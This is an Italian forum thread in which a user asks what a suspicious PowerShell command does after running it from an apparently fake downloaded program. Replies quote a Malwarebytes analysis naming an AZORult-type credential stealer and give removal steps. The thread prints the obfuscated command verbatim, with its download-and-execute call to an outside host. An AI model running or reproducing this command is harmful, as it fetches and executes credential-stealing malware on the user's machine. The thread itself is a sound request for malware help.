Stringa sospetta...

[Pever]

Salve, qualcuno saprebbe indicarmi che comando esegue questa stringa alquanto sospetta?

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted -Windo 1 $ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ','';sal s $ag;$nq=((New-Object Net.WebClient)).DownloadString('http://shortbit.xyz/psp');s $nq

Dopo averla eseguita erroneamente ho fatto la scansione con malwarebytes e non ha trovato nulla, ma non mi fa per nulla sentire più tranquillo :varie13:

 

[Utente cancellato 368991]

Direttamente dal sito di MalwareBytes:

No signs that it is a virus nor that it was generated by a virus. It is a trojan.
The mini script in the LNK file you provided downloads a file purported to be info.doc but it is a large PowerShell script.
It downloads [ from: dir.k.o.n.pserver.ru (185.118.165.205) using TCP port 4577 ] what is purported to be read.doc but it isn't. It's a malicious executable.

While it is not reflected by Virus Total, the payload, which are trojans, are detected by MBAM.

It has properties associated with the AZORult trojan and it is a data stealing trojan.
It tries to harvest and steal the following which includes, but may not be limited to...

• Putty / WinSCP information (sessions, passwords, etc)
• Web Browser information (history, passwords, etc)
• FTP login credentials
• Crypto-Currency Wallets
• Instant Messenger accounts and password credentials
• Email credentials (via file access)

Link ad una possibile risoluzione: https://forums.malwarebytes.com/topic/248154-malicious-downloaded-link/
Soluzione 2 con caso simile (stessa tipologia di Trojan): https://forums.malwarebytes.com/topic/245566-i-opened-a-malicious-powershell-shortcut/

Te la riporto nello spoiler, prova con questa e la soluzione 2.
Facci sapere!

Spoiler: Fix

Please download Sophos Virus Removal Tool and save it to your computer's Desktop.

• Right-click the icon and select Run as administrator.
• Click Yes to accept any security warnings that may appear.
• Click the Next button.
• Select 'I accept the terms in the license agreement', then click Next twice.
• Click the Install button and wait until the installation is complete.
• Click the Finish button. The tool created a shortcut icon on the Desktop of your computer.
• Now, double-click the Sophos Virus Removal Tool shortcut icon to run the tool.
• Click Yes to accept any security warnings that may appear.
• After it updatesand a "Start Scanning" button appears in the lower right:
  • Disconnect from the Internet or physically unplug your Internet cable connection.
  • Close all open programs, scheduling/updating tasks and background processes that might activate during the scan including the screensaver.
  • Temporarily disable your anti-virus and real-time anti-spyware protection.

In breve: si, file sospetto e molto probabilmente a medio-alto rischio.
Hai scaricato e lanciato qualcosa di particolare, recentemente? Da siti possibilmente poco sicuri? Mail o altro?

Nel caso invece così non fosse, attendiamo il parere di qualcuno che abbia avuto più esperienze in merito, che ti potrà seguire meglio.

 

[Pever]

Seguito il "Fix" che hai messo in spoiler, scansionato con sophos, ma non ha trovato nulla...

Egh beh si capisce, avevo scaricato un programmino e come sempre ho fatto scansione della cartella prima di far partire l'eseguibile, quando l'ho avviato e ho fisto la finestra del cmd/powershell flashare ho capito di aver commesso un errore e ho controllato cosa c'era scritto nell'eseguibile...
EDIT: probabilmente era un finto file vlc adesso che ci penso